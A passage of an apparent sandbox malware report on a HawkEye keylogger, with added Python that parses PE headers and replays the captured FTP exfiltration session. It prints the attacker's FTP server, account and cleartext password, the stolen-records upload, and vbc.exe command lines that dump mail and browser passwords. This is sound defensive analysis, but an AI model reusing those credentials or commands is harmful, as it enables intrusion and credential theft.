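    """DOS header -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    pe = {"machine": machine,
          "entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
          "image_base": struct.unpack_from("<I", data, opt + 28)[0],
          "dirs": [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)],
          "sections": []}
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        pe["sections"].append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                               "raw_size": raw_size, "raw_ptr": raw_ptr})
    return pe


def rva_to_offset(pe, rva):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["raw_ptr"] + rva - s["va"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def clr_header(data, pe):
    """IMAGE_COR20_HEADER reached through data directory 14; None for a native PE."""
    rva, size = pe["dirs"][14]
    if size == 0:
        return None
    off = rva_to_offset(pe, rva)
    cb, major, minor, md_rva, md_size, flags, token = struct.unpack_from("<IHHIIII", data, off)
    res_rva, res_size = struct.unpack_from("<II", data, off + 24)
    return {"cb": cb, "runtime_version": f"{major}.{minor}", "metadata": (md_rva, md_size),
            "flags": flags, "entry_point_token": token, "resources": (res_rva, res_size)}


def expected_file_size(pe):
    """File size the section table implies (end of the last raw section)."""
    return max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])


def decode_etag(etag):
    """'<mtime hex>-<size hex>' ETag (nginx form, assumed) -> (HTTP date, size)."""
    mtime_hex, size_hex = etag.strip('"').split("-")
    stamp = datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc)
    return stamp.strftime("%a, %d %b %Y %H:%M:%S GMT"), int(size_hex, 16)


def triage(data, headers):
    """Cross-check the captured header bytes against the HTTP response headers."""
    pe = parse_pe(data)
    clr = clr_header(data, pe)
    etag_mtime, etag_size = decode_etag(headers["ETag"])
    on_disk = expected_file_size(pe)
    return {"dotnet": clr is not None,
            "il_only": bool(clr and clr["flags"] & 0x1),
            "runtime_version": clr["runtime_version"] if clr else None,
            "managed_resource_bytes": clr["resources"][1] if clr else 0,
            "expected_size": on_disk,
            "size_consistent": on_disk == int(headers["Content-Length"]) == etag_size,
            "etag_matches_last_modified": etag_mtime == headers["Last-Modified"]}
```

On these bytes the result is a 32-bit, IL-only .NET executable (runtime 2.5, entry point token 0x060000EC) whose managed-resource blob is 0x10A5FA bytes, about 79% of the file, which fits the "very large array initializations" signature. The section table implies 0x151E00 = 1383936 bytes, equal to Content-Length, to the size field of the ETag and to the size of the dropped name.exe, and the ETag's mtime field decodes to the Last-Modified value, so the capture is complete and the server's headers are self-consistent; a mismatch here would point at a truncated capture or a header-rewriting proxy. Size equality does not prove the dropped file is byte-identical to the download, since the report gives a hash only for the dropped copy.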


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 28, 2021 17:01:21.439057112 CEST | 142.250.203.100 | 443 | 192.168.2.22 | 49168 | CN=www.google.com, O=Google LLC, L=Mountain View, ST=California, C=US | CN=GTS CA 1O1, O=Google Trust Services, C=US | Mon Jun 28 06:12:51 CEST 2021 | Mon Sep 20 06:12:50 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
(intermediate CA certificate, same session) | | | | | CN=GTS CA 1O1, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | |

FTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jul 28, 2021 17:02:02.679359913 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 11:02. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Jul 28, 2021 17:02:02.685182095 CEST | 49171 | 21 | 192.168.2.22 | 45.141.152.18 | USER newloggsaa@vngpack.com
Jul 28, 2021 17:02:02.720918894 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 331 User newloggsaa@vngpack.com OK. Password required
Jul 28, 2021 17:02:02.721275091 CEST | 49171 | 21 | 192.168.2.22 | 45.141.152.18 | PASS Xpen2000
Jul 28, 2021 17:02:02.777319908 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 230 OK. Current restricted directory is /
Jul 28, 2021 17:02:02.812748909 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 504 Unknown command
Jul 28, 2021 17:02:02.813843012 CEST | 49171 | 21 | 192.168.2.22 | 45.141.152.18 | PWD
Jul 28, 2021 17:02:02.851243973 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 257 "/" is your current location
Jul 28, 2021 17:02:02.851687908 CEST | 49171 | 21 | 192.168.2.22 | 45.141.152.18 | TYPE I
Jul 28, 2021 17:02:02.886126041 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 200 TYPE is now 8-bit binary
Jul 28, 2021 17:02:02.886689901 CEST | 49171 | 21 | 192.168.2.22 | 45.141.152.18 | PASV
Jul 28, 2021 17:02:02.925394058 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 227 Entering Passive Mode (45,141,152,18,253,175)
Jul 28, 2021 17:02:02.953810930 CEST | 49171 | 21 | 192.168.2.22 | 45.141.152.18 | STOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
Jul 28, 2021 17:02:02.988127947 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 150 Accepted data connection
Jul 28, 2021 17:02:03.027231932 CEST | 21 | 49171 | 45.141.152.18 | 192.168.2.22 | 226-File successfully transferred
226 0.039 seconds (measured here), 38.00 Kbytes per second
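The control-channel exchange above is the whole exfiltration path: cleartext credentials on port 21, a PASV data channel to a high port, and one STOR of a file whose name carries the HawkEye bot id and a victim-side timestamp. The Python below is an added example, not code from the report or from the sample: it replays the transcribed command/reply lines through a small state machine that pairs each final reply with the pending command (preliminary 1xx replies and the greeting consume nothing, and the stray 504 that arrives with no command pending is recorded rather than mis-attributed), computes the passive-mode endpoint, and decodes the upload name. The server name and address are taken from the DNS answer above.

```python
"""Reconstruct the FTP exfiltration session captured above.

Added example, not part of the Joe Sandbox report. FTP_LINES is transcribed
from the FTP Packets table (multi-line replies split into their lines);
"C" is client -> server, "S" is server -> client.
"""
import re

FTP_SERVER = ("ftp.vngpack.com", "45.141.152.18")  # from the DNS answer above
FTP_LINES = [
    ("S", "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------"),
    ("S", "220-You are user number 1 of 50 allowed."),
    ("S", "220-Local time is now 11:02. Server port: 21."),
    ("S", "220-This is a private system - No anonymous login"),
    ("S", "220-IPv6 connections are also welcome on this server."),
    ("S", "220 You will be disconnected after 15 minutes of inactivity."),
    ("C", "USER newloggsaa@vngpack.com"),
    ("S", "331 User newloggsaa@vngpack.com OK. Password required"),
    ("C", "PASS Xpen2000"),
    ("S", "230 OK. Current restricted directory is /"),
    ("S", "504 Unknown command"),
    ("C", "PWD"),
    ("S", '257 "/" is your current location'),
    ("C", "TYPE I"),
    ("S", "200 TYPE is now 8-bit binary"),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (45,141,152,18,253,175)"),
    ("C", "STOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt"),
    ("S", "150 Accepted data connection"),
    ("S", "226-File successfully transferred"),
    ("S", "226 0.039 seconds (measured here), 38.00 Kbytes per second"),
]
HAWKEYE_RECORD = re.compile(r"HawkEye_Keylogger_Stealer_Records_(\d+) (.+)\.txt")


def parse_pasv(reply):
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' -> (host, p1*256 + p2)."""
    m = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def parse_ftp_session(lines):
    """Walk the control channel, pairing each final reply with the pending command."""
    s = {"server_banner": None, "user": None, "password": None, "logged_in": False,
         "binary_mode": False, "pasv_endpoint": None, "stored_files": [],
         "transfer_ok": False, "unmatched_replies": []}
    pending = None
    for direction, line in lines:
        if direction == "C":
            verb, _, arg = line.partition(" ")
            pending = verb.upper()
            if pending == "USER":
                s["user"] = arg
            elif pending == "PASS":
                s["password"] = arg                 # sent in cleartext on port 21
            elif pending == "STOR":
                s["stored_files"].append(arg)
            continue
        code = line[:3]
        if line[3:4] == "-":                        # continuation of a multi-line reply
            if code == "220" and s["server_banner"] is None:
                s["server_banner"] = line[4:].strip("- ")
            continue
        if code[0] == "1" or (code == "220" and pending is None):
            continue                                # preliminary reply or greeting
        if pending is None:
            s["unmatched_replies"].append(line)     # reply with no command in the capture
        elif pending == "PASS" and code == "230":
            s["logged_in"] = True
        elif pending == "TYPE" and code == "200":
            s["binary_mode"] = True
        elif pending == "PASV" and code == "227":
            s["pasv_endpoint"] = parse_pasv(line)
        elif pending == "STOR" and code == "226":
            s["transfer_ok"] = True
        pending = None
    return s


def hawkeye_record_info(filename):
    """Bot id and victim-side timestamp encoded in HawkEye's upload name."""
    m = HAWKEYE_RECORD.fullmatch(filename)
    return {"bot_id": m.group(1), "victim_time": m.group(2)} if m else None


def iocs(session):
    """Indicators to block or hunt for, derived from the parsed session."""
    host, port = session["pasv_endpoint"] or (FTP_SERVER[1], 21)
    return sorted({f"domain:{FTP_SERVER[0]}", f"ip:{FTP_SERVER[1]}",
                   f"ftp-account:{session['user']}", f"data-channel:{host}:{port}"}
                  | {f"filename:{f}" for f in session["stored_files"]})
```

The passive endpoint resolves to 45.141.152.18:64943 (253*256 + 175), so a firewall rule that only covers port 21 misses the data channel. The timestamp inside the filename (5:26:06 PM) is the sample's own and is 24 minutes ahead of the capture clock (17:02 CEST); it is not the infection time.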

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior


                                                                                      System Behavior

General

Start time: 17:00:40
Start date: 28/07/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f6f0000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:00:42
Start date: 28/07/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:00:46
Start date: 28/07/2021
Path: C:\Users\user\AppData\Roaming\name.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\name.exe'
Imagebase: 0x30000
File size: 1383936 bytes
MD5 hash: FA0A3ED04EEC65D6D3FB55AA7D2497C1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 13%, ReversingLabs
Reputation: low

General

Start time: 17:01:01
Start date: 28/07/2021
Path: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Imagebase: 0x1240000
File size: 41136 bytes
MD5 hash: BB85AA6D90A4157ED799257072B265FF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Start time:17:01:14
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                      Imagebase:0x400000
                                                                                      File size:1170056 bytes
                                                                                      MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Start time:17:01:14
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                      Imagebase:0x400000
                                                                                      File size:1170056 bytes
                                                                                      MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:moderate

                                                                                      Disassembly

                                                                                      Code Analysis
